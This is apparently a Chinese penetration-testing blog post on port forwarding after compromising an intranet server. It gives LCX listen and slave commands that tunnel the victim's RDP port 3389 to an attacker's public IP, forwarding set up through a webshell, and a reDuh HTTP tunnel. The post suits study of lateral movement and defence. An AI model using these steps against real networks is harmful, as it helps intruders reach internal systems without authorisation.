[渗透测试] 端口转发

如果服务器在内网中,一般情况下攻击者无法连接,但是如果其拥有服务器权限后,就可以使用端口转发技术。

一、LCX转发
首先在攻击者自己的机器上执行如下命令:
lcx -listen 500 8888
随后在被攻击的计算机上执行以下命令:
lcx.exe -slave [攻击者公网IP] 500 127.0.0.1 3389
最后攻击者利用“127.0.0.1:8888”就可以连接到终端。

二、使用Shell脚本自带端口转发功能
此功能节约了上传LCX的时间
首先还是要在攻击者端执行lcx -listen 500 8888
在webshell的脚本转发位置进行如下设置:
本地IP:127.0.0.1
本地端口:3389
远程IP:(设置成攻击者IP)
远程端口:500
最后在攻击者端执行“127.0.0.1:8888”

三、reDuh转发
reDuh被称为内网渗透利器,可以将内网的端口以HTTP/HTTPS隧道的方式转发到本机。
reDuh的客户端由Java编写,使用时必须先安装JRE环境。reDuh GUI是一个C++的Windows GUI版本,使用起来更方便。
将程序自带的服务器脚本上传至网站,网站支持哪种语言就上传哪种版本。
随后打开 reDuh GUI界面,在URL输入框里输入连接(刚刚上传脚本文件所在的URL),点击Start。这一步成功后可继续设置其他项目。
在“Remote Host”中输入“127.0.0.1”.“Remote Port”中输入要转发的端口3389,在“Local Port”输入本地连接的端口,然后点击“Create”按钮,即可创建HTTP/HTTPS隧道,在右侧会显示连接信息。
隧道创建后,就可以连接终端,连接方式仍为“127.0.0.1:8888”

你可能感兴趣的:([渗透测试] 端口转发)